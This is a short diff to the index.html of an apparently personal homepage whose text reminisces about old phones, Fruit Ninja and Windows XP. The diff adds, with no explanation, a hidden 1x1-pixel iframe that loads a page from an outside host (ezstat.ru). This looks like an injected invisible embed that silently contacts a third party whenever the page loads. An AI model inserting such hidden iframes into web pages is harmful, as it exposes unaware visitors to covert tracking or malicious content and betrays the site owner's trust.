--- a/index.html
+++ b/index.html
@@ -184,6 +184,7 @@ hr { color: black; background: black; }
 <p>Samsung Galaxy S2 is the first device that I used in 2012. I used to play Fruit Ninja where the game was two years now and my oldest computer are two computers were running Windows XP operating system. I had so much memories from using this.</p>
 <h2>What are you doing in the future?</h2>
 <p>I've been gathering more interesting ideas in my mind instead of going to Discord all day or try to interact golden era ones again.</p>
+<iframe src="https://ezstat.ru/2RqKe7" width="1" height="1"></iframe>
 </div>
 
 <div id="Story" class="tabcontent">
